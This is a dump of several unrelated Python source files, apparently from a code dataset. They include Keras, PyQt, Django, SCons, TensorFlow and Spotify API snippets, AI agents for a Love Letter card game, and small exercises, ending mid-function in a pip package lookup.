text stringlengths 8 6.05M |
|---|
import numpy as np

# Toy gap-filling experiment: each input row is an 11-step sequence with a hole
# in the middle (None placeholders); the target is the 3 missing values.
x_train = [
    [1, 2, 3, 4, 5, None, None, None, 9, 10, 11],
    [2, 3, 4, 5, 6, None, None, None, 10, 11, 12],
    [50, 51, 52, 53, 54, None, None, None, 58, 59, 60]]
y_train = [[6, 7, 8], [7, 8, 9], [55, 56, 57]]
x_test = [[35, 36, 37, 38, 39, None, None, None, 43, 44, 45]]
# NOTE(review): the None entries make np.array produce an object-dtype array;
# Keras cannot train on that — confirm whether a numeric mask value (e.g. 0, or
# NaN plus a Masking layer) was intended here.
x_train = np.array(x_train)
y_train = np.array(y_train)
x_test = np.array(x_test)
print(x_train.shape)
print(y_train.shape)
print(x_test.shape)
# LSTM expects input shaped (samples, timesteps, features)
x_train = x_train.reshape(-1, 11, 1)
x_test = x_test.reshape(-1, 11, 1)
from keras.models import Sequential
from keras.layers import LSTM, Dense
model = Sequential()
model.add(LSTM(50, input_shape=(11, 1), activation='relu'))
# model.add(Dense(10, activation='relu'))
# model.add(Dense(512, activation='relu'))
# model.add(Dense(32, activation='relu'))
# model.add(Dense(16, activation='relu'))
# NOTE(review): 'relu' on the output layer clips negative predictions to zero;
# a linear activation is the usual choice for regression — confirm intent.
model.add(Dense(3, activation='relu'))
model.compile(optimizer='adam', loss='mse', metrics=['mse'])
model.fit(x_train, y_train, epochs=30, batch_size=1, verbose=2)
pred = model.predict(x_test, batch_size=1)
print(pred)
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QRect, QPoint
from PyQt5.QtGui import QBrush
class TextBox(QRect):
    """A QRect that sizes itself to wrap a piece of (possibly multi-line) text.

    The rectangle's width/height are recomputed from the text on every
    setText() call; draw() paints an optional border and the text lines.
    """

    def __init__(self, parent, border=False, width=10, height=10, text=""):
        super(TextBox, self).__init__()
        self.parent = parent      # owning widget/item; used for positioning by callers
        self.setText(text)
        self.border = border      # whether draw() paints a bounding rectangle

    def setText(self, txt):
        """Store *txt* split into stripped lines and resize the box to fit."""
        self.lines = []
        content = txt.split('\n')
        for c in content:
            self.lines.append(c.strip())
        # adapt text box area to text length
        # NOTE(review): 64 px per character looks very wide — confirm the
        # intended per-glyph width against the font actually used.
        self.setWidth(self.maxLineLength() * 64)
        self.setHeight(self.numLines() * 16)

    def getSize(self):
        # BUG FIX: QRect.size is a method, so `return self.size` returned the
        # bound-method object rather than a QSize; call it.
        return self.size()

    def maxLineLength(self):
        """
        Returns number of characters
        in longest line
        """
        # BUG FIX: the original appended len(self.lines) (the line COUNT) once
        # per line, so the computed width depended on how many lines there
        # were, not how long they are.
        return max(len(line) for line in self.lines)

    def numLines(self):
        """
        Returns number of lines in text box
        """
        return len(self.lines)

    def hasBorder(self):
        return self.border

    def draw(self, painter):
        """Paint the optional border, then the text lines bottom-up."""
        if self.hasBorder():
            # draw bounding rect
            painter.setPen(Qt.black)
            painter.setBrush(QBrush(Qt.white))
            painter.drawRect(self)
        # draw text: iterate the lines in reverse, stepping up one line-height
        # from the bottom edge each time
        dy = self.height() / len(self.lines)
        x = self.x() + 3
        y = self.y() + self.height() - 3
        for line in self.lines[::-1]:
            painter.drawText(QPoint(x, y), line)
            y -= dy
|
from django.db.models import Q
from django.shortcuts import render
from service.models import Service
from forum.models import Topic, Post
def search(request):
    """Render search results over services and forum topics for ?zapros=<query>."""
    zapros = request.GET.get('zapros')
    # Services match on title OR description; topics match on title only.
    service_query = Q(title__contains=zapros) | Q(description__contains=zapros)
    service_search = Service.objects.filter(service_query)
    forum_search = Topic.objects.filter(Q(title__contains=zapros))
    context = {
        'zapros': zapros,
        'service_search': service_search,
        'forum_search': forum_search,
    }
    return render(request, 'search/search.html', context)
#!/usr/bin/python
##
# Example building script
# @author : Devresse Adrien
# @version : v0.2
# @date 21/03/2011
Import('*')  # import SConstruct exported vars (env, old_gfal_header, ARGUMENTS, ...)
import os
import random
import shutil
import commands  # NOTE(review): Python-2-only module and appears unused here — confirm before removing

# One source list per test executable.
src = ['example/gfal_testrw.c']
src2 = ['example/gfal_testread.c']
src3 = ['example/gfal_testdir.c']
src4 = ['example/gfal_testchmod.c']
src5 = ['example/gfal_testcreatedir.c']
src6 = ['example/gfal_teststat.c']
src7 = ['example/gfal_testget.c']
old_suffix = ""
# Clone the build environment so test-only flags don't leak into the main build.
env_testing = env.Clone()
if ARGUMENTS.get('old_mode', '0') == 'yes':
    # Legacy GFAL 1.x mode: link the old library, define the compat macro and
    # point at the old headers; binaries get an "_old" suffix.
    env_testing.Append(LIBS="gfal")
    env_testing.Append(CFLAGS="-D_GFAL_1_X")
    env_testing["CPPPATH"] = old_gfal_header
    old_suffix = "_old"
else:
    env_testing.Append(LIBS="gfal2")
# One test binary per source list.
env_testing.Program("build/gfal_testrw" + old_suffix, src)
env_testing.Program("build/gfal_testread" + old_suffix, src2)
env_testing.Program("build/gfal_testdir" + old_suffix, src3)
env_testing.Program("build/gfal_testchmod" + old_suffix, src4)
env_testing.Program("build/gfal_testcreatedir" + old_suffix, src5)
env_testing.Program("build/gfal_teststat" + old_suffix, src6)
env_testing.Program("build/gfal_testget" + old_suffix, src7)
|
# Distance traveled
# Calculation for traveled distance
# Anatoli Penev
# 27.10.2017
car_speed = 60  # constant travel speed, miles per hour
time1 = 5       # hours of travel
time2 = 8       # hours of travel
time3 = 12      # hours of travel

# distance = speed * time for each duration
distance1 = car_speed * time1
distance2 = car_speed * time2
distance3 = car_speed * time3

# Report each computed distance.
for hours, distance in ((5, distance1), (8, distance2), (12, distance3)):
    print("Distance traveled for %d hours" % hours, distance)
|
# -*- coding: utf-8 -*-
class Solution:
    """Search in a rotated sorted array in O(log n) (LeetCode 33)."""

    def search(self, nums, target):
        """Return the index of *target* in rotated sorted *nums*, or -1 if absent."""
        lo, hi = 0, len(nums) - 1
        while lo <= hi:
            mid = (lo + hi) // 2
            if nums[mid] == target:
                return mid
            # Exactly one half of [lo, hi] is sorted; decide which side holds target.
            if nums[lo] <= nums[mid]:
                # Left half sorted: go left only if target lies inside it.
                go_left = nums[lo] <= target < nums[mid]
            else:
                # Right half sorted: go left unless target lies inside it.
                go_left = not (nums[mid] < target <= nums[hi])
            if go_left:
                hi = mid - 1
            else:
                lo = mid + 1
        return -1
if __name__ == "__main__":
    # Quick sanity checks on sample rotated arrays.
    solver = Solution()
    assert solver.search([4, 5, 6, 7, 0, 1, 2], 0) == 4
    assert solver.search([4, 5, 6, 7, 0, 1, 2], 3) == -1
|
import sys, random
from observer import Observer
from card import Cards, CardSet
from log import Log
class Agent:
    """Base player agent for a Love Letter-style card game.

    Tracks this player's own hand and forwards every game event to an
    Observer that maintains beliefs about the other players' cards.
    """

    def __init__(self, player, names):
        self.player = player              # this agent's seat index
        self.name = names[player]
        self.observer = Observer(names)   # belief tracker over all seats
        self.cards = []                   # cards currently held

    def __str__(self):
        return self.name

    def start_game(self):
        self.observer.start_game()

    def start_round(self, card):
        # A round begins with a single dealt card.
        self.observer.start_round(self.player, card)
        self.cards = [card]

    def report_draw(self, card):
        self.observer.report_draw(self.player, card)
        self.cards.append(card)

    def end_round(self, cards, winner):
        self.observer.end_round(cards, winner)

    def end_game(self, winner):
        # Base agent keeps no end-of-game state.
        pass

    def report_play(self, *k, **kw):
        """Update own hand from a play event (kwargs mirror the engine's report)."""
        self.observer.report_play(*k, **kw)
        player = kw['player']
        card = kw['card']
        target = kw.get('target', None)
        discard = kw.get('discard', None)
        new_card = kw.get('new_card', None)
        other_card = kw.get('other_card', None)
        loser = kw.get('loser', None)
        if self.player == player:
            self.cards.remove(card)
        # Card effects only resolve when the target was not Handmaiden-protected.
        if target is not None and not self.observer.players[target].handmaiden:
            if card == Cards.BARON and self.player == loser:
                self.cards.remove(discard)       # lost the Baron comparison: hand discarded
            elif card == Cards.PRINCE and self.player == target:
                self.cards.remove(discard)       # forced discard, then draw a replacement
                self.cards.append(new_card)
            elif card == Cards.KING and self.player in (player, target):
                del self.cards[0]                # King: swap hands with the other party
                self.cards.append(other_card)

    def _get_required_play(self):
        # Rule: the Countess must be played when held with a Prince or King.
        if Cards.COUNTESS in self.cards:
            if Cards.PRINCE in self.cards or Cards.KING in self.cards:
                return {'card': Cards.COUNTESS}
        return None
class LowballAgent(Agent):
    """Heuristic agent: always plays the lower of its two cards, choosing
    targets from the Observer's probability estimates of opponents' hands."""

    def __init__(self, player, names):
        super(LowballAgent, self).__init__(player, names)

    def start_round(self, card):
        super(LowballAgent, self).start_round(card)
        Log.print('ai: %s starts with card %s' % (self.name, Cards.name(card)))

    def report_draw(self, card):
        super(LowballAgent, self).report_draw(card)
        Log.print('ai: %s draws card %s' % (self.name, Cards.name(card)))

    def report_play(self, *k, **kw):
        """Log any information the play revealed to (or about) this agent."""
        super(LowballAgent, self).report_play(*k, **kw)
        card = kw['card']
        player = kw['player']
        target = kw.get('target', None)
        if target and not self.observer.players[target].handmaiden:
            if player == self.player:
                if card == Cards.PRIEST:
                    Log.print('ai: %s has card %s' % (self.observer.players[target], Cards.name(kw['other_card'])))
                elif card == Cards.KING:
                    Log.print('ai: %s now has card %s' % (self.name, Cards.name(kw['other_card'])))
            elif target == self.player:
                if card == Cards.BARON and kw.get('loser', None) == self.player:
                    Log.print('ai: Winning card was %s' % Cards.name(kw['other_card']))
                elif card == Cards.PRINCE and kw['discard'] != Cards.PRINCESS:
                    Log.print('ai: %s draws card %s' % (self.name, Cards.name(kw['new_card'])))
                elif card == Cards.KING:
                    Log.print('ai: %s now has card %s' % (self.name, Cards.name(kw['other_card'])))

    def _most_likely(self, exclude_card=None):
        """Return (player, card, certainty) for the live opponent whose hand the
        observer is MOST certain about; handmaiden-protected players sort last."""
        lst = []
        for player in self.observer.players:
            if player.number != self.player and not player.out:
                (card, certainty) = player.cards.most_likely(exclude_card)
                lst.append((player, card, certainty))
        # Shuffle first so the stable sorts below break exact ties randomly.
        random.shuffle(lst)
        lst = sorted(lst, key=lambda x: x[0].score, reverse=True)
        lst = sorted(lst, key=lambda x: x[2], reverse=True)
        lst = sorted(lst, key=lambda x: x[0].handmaiden)
        Log.print('ai: Hand probabilities:')
        for l in lst:
            Log.print('ai: %s: %s (%i%% chance) %s' % (l[0].name, Cards.name(l[1]), l[2] * 100, '(HANDMAIDEN)' if l[0].handmaiden else ''))
        winner = lst[0]
        Log.print('ai: %s has most certain hand (%i%% chance of card %s)' % (winner[0].name, winner[2] * 100, Cards.name(winner[1])))
        return winner

    def _least_likely(self, exclude_card=None):
        """Return (player, card, certainty) for the live opponent whose hand the
        observer is LEAST certain about (best Priest target)."""
        lst = []
        for player in self.observer.players:
            if player.number != self.player and not player.out:
                (card, certainty) = player.cards.most_likely(exclude_card)
                lst.append((player, card, certainty))
        random.shuffle(lst)
        lst = sorted(lst, key=lambda x: x[0].score, reverse=True)
        lst = sorted(lst, key=lambda x: x[2])
        lst = sorted(lst, key=lambda x: x[0].handmaiden)
        Log.print('ai: Hand probabilities:')
        for l in lst:
            Log.print('ai: %s: %s (%i%% chance) %s' % (l[0].name, Cards.name(l[1]), l[2] * 100, '(HANDMAIDEN)' if l[0].handmaiden else ''))
        winner = lst[0]
        Log.print('ai: %s has least certain hand (%i%% chance of card %s)' % (winner[0].name, winner[2] * 100, Cards.name(winner[1])))
        return winner

    def _most_likely_less_than(self, card):
        """Return (player, certainty) for the opponent most likely to hold a
        card weaker than *card* (best Baron target)."""
        lst = []
        for player in self.observer.players:
            if player.number != self.player and not player.out:
                certainty = player.cards.chance_less_than(card)
                lst.append((player, certainty))
        random.shuffle(lst)
        lst = sorted(lst, key=lambda x: x[0].score, reverse=True)
        lst = sorted(lst, key=lambda x: x[1], reverse=True)
        lst = sorted(lst, key=lambda x: x[0].handmaiden)
        Log.print('ai: Probabilities that hand is less than %s:' % Cards.name(card))
        for l in lst:
            Log.print('ai: %s: %i%% %s' % (l[0].name, l[1] * 100, '(HANDMAIDEN)' if l[0].handmaiden else ''))
        winner = lst[0]
        Log.print('ai: %s has best chance (%i%%)' % (winner[0].name, winner[1] * 100))
        return winner

    def _highest_expected_value(self):
        """Return (player, value) for the opponent with the highest expected
        hand value (best Prince/King target)."""
        lst = []
        for player in self.observer.players:
            if player.number != self.player and not player.out:
                value = player.cards.expected_value()
                lst.append((player, value))
        random.shuffle(lst)
        lst = sorted(lst, key=lambda x: x[0].score, reverse=True)
        lst = sorted(lst, key=lambda x: x[1], reverse=True)
        lst = sorted(lst, key=lambda x: x[0].handmaiden)
        Log.print('ai: Expected hand values:')
        for l in lst:
            Log.print('ai: %s: %f %s' % (l[0].name, l[1], '(HANDMAIDEN)' if l[0].handmaiden else ''))
        winner = lst[0]
        Log.print('ai: %s has highest expected hand value %f' % (winner[0].name, winner[1]))
        return winner

    def get_play(self):
        """Choose a play: forced Countess if required, otherwise the lower of
        the two held cards with a heuristically chosen target."""
        Log.print('ai: %s play options: %s %s' % (self.name, Cards.name(self.cards[0]), Cards.name(self.cards[1])))
        self.observer.print_state('ai')
        ret = self._get_required_play()
        if not ret:
            cards = sorted(self.cards)
            card = cards[0]          # "lowball": play the weaker card
            other_card = cards[1]
            ret = {'card': card}
            if card == Cards.GUARD:
                (player, card, certainty) = self._most_likely(exclude_card=Cards.GUARD)
                # Prefer hiding behind the Handmaiden over guessing blind.
                if other_card == Cards.HANDMAIDEN and certainty < 1:
                    ret['card'] = Cards.HANDMAIDEN
                else:
                    ret['target'] = player.number
                    ret['challenge'] = card
            elif card == Cards.PRIEST:
                (player, card, certainty) = self._least_likely()
                if other_card == Cards.HANDMAIDEN:
                    ret['card'] = Cards.HANDMAIDEN
                else:
                    ret['target'] = player.number
            elif card == Cards.BARON:
                (player, certainty) = self._most_likely_less_than(other_card)
                if other_card == Cards.HANDMAIDEN and certainty < 1:
                    ret['card'] = Cards.HANDMAIDEN
                else:
                    ret['target'] = player.number
            elif card in (Cards.PRINCE, Cards.KING):
                (player, value) = self._highest_expected_value()
                ret['target'] = player.number
        return ret
class EndgameAgent(LowballAgent):
    """Lowball agent with special Prince/King logic once the deck nearly runs out."""

    def get_play(self):
        # Endgame: at most one card per remaining player left in the deck.
        if self.observer.deck_size <= len(self.observer.players):
            if Cards.PRINCE in self.cards:
                other_card = self.cards[0] if self.cards[1] == Cards.PRINCE else self.cards[1]
                deck_value = self.observer.deck_set.expected_value()
                if deck_value > other_card and deck_value > Cards.PRINCE:
                    # Prince ourselves: the expected draw beats what we hold.
                    ret = {'card' : Cards.PRINCE, 'target' : self.player }
                    return ret
                else:
                    # Otherwise force the strongest-looking opponent to redraw,
                    # if the deck is expected to WEAKEN their hand.
                    values = [(i, player.cards.expected_value()) for (i, player) in enumerate(self.observer.players)]
                    values = sorted(values, key=lambda x: x[1], reverse=True)
                    for (i, value) in values:
                        if self.observer.players[i].out or i == self.player:
                            continue
                        if value > deck_value:
                            ret = {'card' : Cards.PRINCE, 'target' : i}
                            return ret
            elif Cards.KING in self.cards:
                other_card = self.cards[0] if self.cards[1] == Cards.KING else self.cards[1]
                values = [(i, player.cards.expected_value()) for (i, player) in enumerate(self.observer.players)]
                values = sorted(values, key=lambda x: x[1], reverse=True)
                for (i, value) in values:
                    if self.observer.players[i].out or i == self.player:
                        continue
                    # Swap hands only when the target's expected card beats ours.
                    if value > other_card and value > Cards.KING:
                        ret = {'card' : Cards.KING, 'target' : i}
                        return ret
        # No endgame action applied: fall back to the lowball heuristic.
        return super(EndgameAgent, self).get_play()
class ConsoleAgent(Agent):
    """Interactive agent driven by a human player via stdin/stdout."""

    def __init__(self, player, names):
        super(ConsoleAgent, self).__init__(player, names)
        Log.enable('report', stripped=True)

    def start_round(self, card):
        super(ConsoleAgent, self).start_round(card)
        print()
        print('%s starts with card %s' % (self.name, Cards.name(card)))
        # Per-card discard counters, shown to the player before each turn.
        self.discarded = [0 for i in range(Cards.NUM_CARDS)]

    def report_draw(self, card):
        super(ConsoleAgent, self).report_draw(card)
        print('%s draws card %s' % (self.name, Cards.name(card)))

    def report_play(self, *k, **kw):
        """Update discard counters and echo whatever information the play revealed."""
        super(ConsoleAgent, self).report_play(*k, **kw)
        player = kw['player']
        card = kw['card']
        self.discarded[card] += 1
        target = kw.get('target', None)
        discard = kw.get('discard', None)
        if discard:
            self.discarded[discard] += 1
        if target:
            if not self.observer.players[target].handmaiden:
                if card == Cards.PRIEST:
                    other_card = kw.get('other_card', None)
                    if other_card:
                        print('%s has card %s' % (self.observer.players[target], Cards.name(other_card)))
                elif card == Cards.BARON:
                    loser = kw.get('loser', None)
                    if loser is not None:
                        other_card = kw.get('other_card', None)
                        if other_card:
                            print('Winning card was %s' % Cards.name(other_card))
                elif card == Cards.PRINCE:
                    new_card = kw.get('new_card', None)
                    if new_card:
                        print('%s draws new card %s' % (self.observer.players[target], Cards.name(new_card)))
                elif card == Cards.KING:
                    other_card = kw.get('other_card', None)
                    if other_card:
                        print('%s now has card %s' % (self.observer.players[target], Cards.name(other_card)))

    def get_play(self):
        """Prompt the human for a card, plus a target/challenge where the card needs one."""
        card = None
        self.cards = sorted(self.cards)
        play = {}
        print()
        s = ' '.join(['%s(%i)' % (player.name, player.score) for player in self.observer.players if not player.out])
        print('Players still in round: %s' % s)
        s = ' '.join('%s(%i)' % (Cards.name(card), self.discarded[card]) for card in range(Cards.NUM_CARDS) if self.discarded[card] > 0)
        print('Discarded cards: %s' % s)
        # Loop until a legal card is chosen.
        while card is None:
            print('Available cards are [%i] %s [%i] %s' % (self.cards[0], Cards.name(self.cards[0]), self.cards[1], Cards.name(self.cards[1])))
            print('Enter selection: ', end='')
            sys.stdout.flush()
            line = sys.stdin.readline().strip()
            # 'enable <tag>' / 'disable <tag>' toggle log channels instead of playing.
            if line.startswith('enable'):
                Log.enable(line.split(' ')[1])
                continue
            elif line.startswith('disable'):
                Log.disable(line.split(' ')[1])
                continue
            try:
                c = int(line)
                if c in self.cards:
                    card = c
            except ValueError:
                pass
            if card is None:
                print(' Invalid selection')
            elif card in (Cards.PRINCE, Cards.KING) and Cards.COUNTESS in self.cards:
                # Rule: the Countess must be played when held with Prince/King.
                print(' Must discard COUNTESS')
                card = None
        play['card'] = card
        if card in (Cards.GUARD, Cards.PRIEST, Cards.BARON, Cards.PRINCE, Cards.KING):
            # Build the list of legal targets (only the Prince may self-target).
            players = []
            for player in self.observer.players:
                if player.out:
                    continue
                if player.number == self.player and card != Cards.PRINCE:
                    continue
                players.append(player)
            target = None
            while target is None:
                print()
                s = ' '.join(['[%i] %s' % (player.number + 1, player.name) for player in players])
                print('Players: %s' % s)
                print('Enter target player: ', end='')
                sys.stdout.flush()
                try:
                    t = int(sys.stdin.readline()) - 1   # displayed numbers are 1-based
                    if t in range(len(self.observer.players)) and self.observer.players[t] in players:
                        target = t
                except IndexError:
                    pass
                except ValueError:
                    pass
                if target is None:
                    print(' Invalid selection')
            play['target'] = target
            if card == Cards.GUARD:
                # The Guard additionally needs a card to challenge with.
                challenge = None
                while challenge is None:
                    print()
                    s = ' '.join(['[%i] %s' % (card, Cards.name(card)) for card in range(Cards.GUARD, Cards.NUM_CARDS)])
                    print('Cards: %s' % s)
                    print('Enter challenge card: ', end='')
                    sys.stdout.flush()
                    try:
                        c = int(sys.stdin.readline())
                        if c in range(Cards.GUARD, Cards.NUM_CARDS):
                            challenge = c
                    except ValueError:
                        pass
                    if challenge is None:
                        print(' Invalid selection')
                play['challenge'] = challenge
        return play
class RandomAgent(Agent):
    """Agent that plays a uniformly random legal card (never the Princess)."""

    def get_play(self):
        ret = self._get_required_play()
        if not ret:
            ret = {}
            cards = list(self.cards)
            if Cards.PRINCESS in cards:
                cards.remove(Cards.PRINCESS)   # discarding the Princess loses immediately
            card = random.choice(cards)
            ret['card'] = card
            if card in (Cards.GUARD, Cards.PRIEST, Cards.BARON, Cards.PRINCE, Cards.KING):
                players = [i for i in range(len(self.observer.players)) if not self.observer.players[i].out]
                if card != Cards.PRINCE:
                    players.remove(self.player)   # only the Prince may self-target
                target = random.choice(players)
                ret['target'] = target
                if card == Cards.GUARD:
                    # Random Guard guess among the non-Guard cards.
                    ret['challenge'] = random.choice(range(Cards.PRIEST, Cards.NUM_CARDS))
        return ret
|
from django.contrib.auth.models import Group, User
def user_is_moderator(user: User) -> bool:
    """Return True iff *user* is authenticated and belongs to the "moderators" group.

    BUG FIX: the original called Group.objects.get(name="moderators"), which
    raises Group.DoesNotExist when the group has not been created yet. Querying
    the user's own groups avoids the exception (and an extra query) and simply
    returns False when no such group exists.
    """
    if not user.is_authenticated:
        return False
    return user.groups.filter(name="moderators").exists()
|
import tensorflow as tf
import os
from PIL import Image
import numpy as np
import string
class GenerateTFRecord:
    '''
    Convert the image to binary records and store them in TFRecord format.
    It is efficient to read data.
    '''

    def __init__(self, labels):
        self.labels = labels   # maps label key (e.g. '7', 'A') -> integer class id

    def _convert_image_folder(self, img_folder, tfreocrd_file_name):
        # Serialize every image under every subfolder of *img_folder* into a
        # single TFRecord file. (Parameter keeps the original "tfreocrd"
        # spelling so keyword callers keep working.)
        img_folder_paths = os.listdir(img_folder)
        img_folder_paths.sort()
        writer = tf.python_io.TFRecordWriter(tfreocrd_file_name)   # TF 1.x API
        for folder in img_folder_paths:
            folder_path = os.path.join(img_folder, folder)
            imgs = sorted(os.listdir(folder_path))
            imgs = [os.path.abspath(os.path.join(folder_path, i)) for i in imgs]  # get the absolute path of every image
            for img in imgs:
                example = self._convert_image(img)
                writer.write(example.SerializeToString())
        writer.close()

    def _convert_image(self, img_path):
        # Build a tf.train.Example holding filename, dimensions, raw bytes and label.
        label = self._get_label_with_filename(img_path)
        img = Image.open(img_path)
        img_int = np.array(img, dtype=np.int64)
        img_shape = img_int.shape
        # assumes single-channel 100x100 images — TODO confirm; RGB input would
        # have shape (100, 100, 3) and fail here
        assert img_shape == (100, 100)
        filename = os.path.basename(img_path)
        # Read image data in terms of bytes
        with tf.gfile.GFile(img_path, 'rb') as fid:
            image_data = fid.read()
        example = tf.train.Example(features=tf.train.Features(feature={
            'filename': tf.train.Feature(bytes_list=tf.train.BytesList(value=[filename.encode('utf-8')])),  # if not encode, raise TypeError: '0000_0_0_size_30_angle_0.png' has type str, but expected one of: bytes
            'rows': tf.train.Feature(int64_list=tf.train.Int64List(value=[img_shape[0]])),
            'cols': tf.train.Feature(int64_list=tf.train.Int64List(value=[img_shape[1]])),
            'image': tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_data])),
            'label': tf.train.Feature(int64_list=tf.train.Int64List(value=[label]))
        }))
        return example

    def _get_label_with_filename(self, filename):
        # Filenames look like '0000_0_0_size_30_angle_0.png'; the third
        # underscore-separated field is used as the label key — TODO confirm
        # the naming convention against the dataset.
        basename = os.path.basename(filename).split('.')[0]
        basename = basename.split('_')[2]
        return self.labels[basename]
if __name__ == '__main__':
    # Label keys are the digits 0-9 followed by the uppercase letters A-Z,
    # mapped to consecutive integer class ids.
    keys = list(string.digits) + list(string.ascii_uppercase)
    labels = {key: index for index, key in enumerate(keys)}
    converter = GenerateTFRecord(labels)
    converter._convert_image_folder('hologram_image', 'images_gfile.tfrecord')
|
# -*- coding: utf-8 -*-
import os
import random

# Build ST: four DISTINCT random digits (kept as strings) the player must guess.
# BUG FIX: the original used randrange(0, 9), whose upper bound is exclusive,
# so the digit 9 could never appear in the answer.
ST = []
t = 0
while t < 4:
    tem = str(random.randrange(0, 10))
    if tem not in ST:
        ST.append(tem)
        t += 1

time = 1  # guess counter
while True:
    print("猜第%d次。\n請輸入一個不重覆的四位數字或輸入'STOP'以退出遊戲:" % time)
    A = 0  # count of correct digits in the correct position
    B = 0  # count of digits present anywhere (superset of A)
    input_s = input()
    if "STOP" in input_s.upper():
        print("離開遊戲! 正確答案為 %s" % "".join(str(n) for n in ST))
        break
    else:
        try:
            int(input_s)
            # Non-numeric input raises ValueError and is reported below.
            if "".join(str(n) for n in ST) == input_s:
                # BUG FIX: the original wrote `print("...") % time`, applying %
                # to print()'s None return value. The resulting TypeError was
                # swallowed by the bare `except`, so a correct guess printed the
                # "non-numeric" error instead of winning — the game could never
                # be won.
                print("Good Job!! 共猜了 %d 次" % time)
                break
            elif len(input_s) != 4:
                print("錯誤! 不正確的長度!\n")
            else:
                # Wrong guess: report the A/B difference against the target.
                for tem in range(4):
                    if ST[tem] == input_s[tem]:
                        A += 1
                    if input_s[tem] in ST:
                        B += 1
                # B counts every included digit, so subtract A to report only
                # the right-digit-wrong-place count.
                print("%d A\t%d B" % (A, B - A))
            time += 1
        except ValueError:
            # BUG FIX: narrowed the bare `except:` to ValueError (non-numeric
            # input) so real defects are no longer hidden, and qualified the
            # undefined `system("pause")` call (NameError) as os.system.
            print("錯誤! 內含非數字的字串\n")
            os.system("pause")  # NOTE(review): "pause" is Windows-only — confirm target platform
|
from 基于文本内容的垃圾短信识别.data_process import data_process
from wordcloud import WordCloud
import matplotlib.pyplot as plt
data_str, data_after_stop, labels = data_process()

# Word frequency count over the non-spam messages (label == 0).
# NOTE(review): the boolean-mask indexing suggests data_after_stop and labels
# are pandas Series — confirm data_process()'s return types.
word_fre = {}
for i in data_after_stop[labels == 0]:
    for j in i:
        if j not in word_fre.keys():
            word_fre[j] = 1
        else:
            word_fre[j] += 1

# Draw the word cloud inside the speech-bubble mask image, using a CJK font
# so Chinese tokens render correctly.
mask = plt.imread('./data/duihuakuan.jpg')
wc = WordCloud(font_path='/usr/share/fonts/opentype/noto/NotoSerifCJK-Medium.ttc',mask=mask,background_color='white')
wc.fit_words(word_fre)
plt.imshow(wc)
plt.axis('off')
plt.show()
|
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
# Project URL table: root app, admin, auth, and the two sub-portals.
urlpatterns = [
    path('', include('portalBase.urls')),                     # site root
    path('portalHome/', include('portalBase.urls')),          # alias of the root app
    path('admin/', admin.site.urls),
    path('accounts/', include('django.contrib.auth.urls')),   # login/logout/password views
    # NOTE(review): `name=` combined with include() is not how Django names
    # routes — names belong on the individual paths inside the included
    # URLconf (or use a namespace). Confirm whether these names are ever used.
    path('phDAdmission/', include('phDAdmissionPortal.urls'), name = "phDAdmission"),
    path('yourApp/', include('yourApp.urls'), name = "yourApp"),
]
"""
Abandon hope all ye who enter the depths of this module
""" |
import spotipy
import spotipy.util as util
import config
# Every OAuth scope this tool may request; spotipy accepts a
# whitespace-separated scope list, so the multi-line string works as-is.
MASTER_SCOPE = """user-library-read
playlist-read-private
user-library-modify
playlist-modify-public
user-read-recently-played
user-read-private
user-read-email
playlist-modify-private
streaming
user-top-read
user-read-birthdate
playlist-read-collaborative
user-modify-playback-state
user-follow-modify
user-read-currently-playing
user-read-playback-state
user-follow-read"""
def get_spotify_client():
    """Run the spotipy OAuth flow for the configured user and return a wrapped client.

    May open a browser / prompt on stdin (spotipy's prompt_for_user_token).
    Credentials come from the local `config` module.
    """
    token = util.prompt_for_user_token(
        config.USERNAME,
        MASTER_SCOPE,
        client_id=config.CLIENT_ID,
        client_secret=config.CLIENT_SECRET,
        redirect_uri=config.REDIRECT_URI
    )
    sp = spotipy.Spotify(auth=token)
    return SpotifyClient(sp)
class SpotifyClient(object):
    """Thin convenience wrapper over a spotipy.Spotify instance.

    All playlist operations act on the user named in `config.USERNAME`.
    """

    def __init__(self, sp):
        self.sp = sp   # authenticated spotipy.Spotify client

    def get_all_saved_tracks(self):
        """Return the URIs of every track in the user's Saved Tracks (paged by 50)."""
        offset = 0
        limit = 50
        ret = []
        while True:
            results = self.sp.current_user_saved_tracks(limit=limit, offset=offset)
            if len(results['items']) == 0:
                break
            ret.extend([item['track']['uri'] for item in results['items']])
            offset += limit
        return ret

    def get_all_owned_playlists(self):
        """Returns dict mapping playlist name to URI."""
        offset = 0
        limit = 50
        ret = {}
        while True:
            results = self.sp.user_playlists(config.USERNAME, limit=limit, offset=offset)
            if len(results['items']) == 0:
                break
            for item in results['items']:
                owner = item['owner']['id']
                if owner == config.USERNAME:   # skip followed playlists owned by others
                    ret[item['name']] = item['uri']
            offset += limit
        return ret

    def get_all_songs_in_playlist(self, playlist):
        """Return parallel lists (track URIs, added dates) for *playlist* (paged by 100)."""
        offset = 0
        limit = 100
        uris = []
        dates = []
        while True:
            results = self.sp.user_playlist_tracks(
                config.USERNAME, playlist_id=playlist, limit=limit, offset=offset)
            if len(results['items']) == 0:
                break
            uris.extend([item['track']['uri'] for item in results['items']])
            # 'added_at' is an ISO 8601 timestamp; keep only the date part.
            dates.extend([item['added_at'].split('T')[0] for item in results['items']])
            offset += limit
        return uris, dates

    def add_tracks_to_playlist(self, playlist, tracks):
        self.sp.user_playlist_add_tracks(config.USERNAME, playlist, tracks)

    def remove_tracks_from_playlist(self, playlist, tracks):
        # Removes EVERY occurrence of each track, not just the first.
        self.sp.user_playlist_remove_all_occurrences_of_tracks(config.USERNAME, playlist, tracks)

    def remove_tracks_from_all_playlists(self, playlists, tracks):
        for playlist in playlists:
            self.remove_tracks_from_playlist(playlist, tracks)
|
import os
import re
import shutil
import subprocess
import get_package_info
import Retrieve_Hash_Custom_PIP_Package
import numpy as np
from colorama import Fore, Style, Back, init
def find_check_package(package=None):
    """Resolve *package* to an exact (name, version) tuple.

    Queries get_package_info (returns a NumPy array of [name, version] rows);
    if several packages match, lists them and interactively asks the user to
    pick one, recursing on the answer. Returns None when nothing matches.
    """
    found_package = None
    package_info = get_package_info.get_package_info(package=package)
    if package_info is None:
        print("\nThere is no package matching the search for \"" + package + "\" \n")
        return None
    elif len(package_info[:, 0]) == 1:  # exactly one package found: done
        package_version = package_info[0][1]
        found_package = (package, package_version)
        return found_package
    else:
        # Several candidates: print them two per row and prompt for a choice.
        is_in_package_list = package in package_info[:, 0]
        if not is_in_package_list:
